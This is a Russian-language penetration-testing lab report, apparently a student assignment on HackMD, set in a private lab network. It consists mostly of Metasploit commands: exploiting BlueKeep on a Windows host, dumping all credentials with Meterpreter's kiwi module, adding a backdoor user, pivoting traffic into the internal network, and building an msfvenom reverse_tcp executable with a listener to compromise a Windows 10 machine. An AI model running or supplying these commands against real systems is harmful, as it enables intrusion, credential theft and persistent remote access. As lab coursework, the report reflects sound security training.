# Практическая работа №3 ## Инфраструктура  ## Выполнение заданий ### Проброс портов 445/tcp и 3389/tcp на PfSense  ### Сканирование #### Обычное сканирование по портам  #### Агрессивное сканирование по портам  ### Metasploit Framework ``` msfconsole search bluekeep use 1 set rhost 192.168.28.130 show targets ```  ``` set target 8 run ```  ### Payload Meterpreter #### Скриншот ``` screenshare ```  #### Все учетные записи ``` load kiwi creds_all ```  #### Создание нового пользователя ``` bg use post/windows/manage/add_user sessions sessions 1 run getgui -u Nikita -p Pass ```  #### Выполнить проксирование трафика во внутреннюю инфраструктуру ``` portfwd add -L 192.168.28.129 -l 2323 -p 443 -r 192.168.1.1 ```   ### Взлом Win10  ``` msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.104 LPORT=4444 -f exe -o payload_1.exe python -m SimpleHTTPServer 80 ```  ``` msfconsole use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 0.0.0.0 run ``` 
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up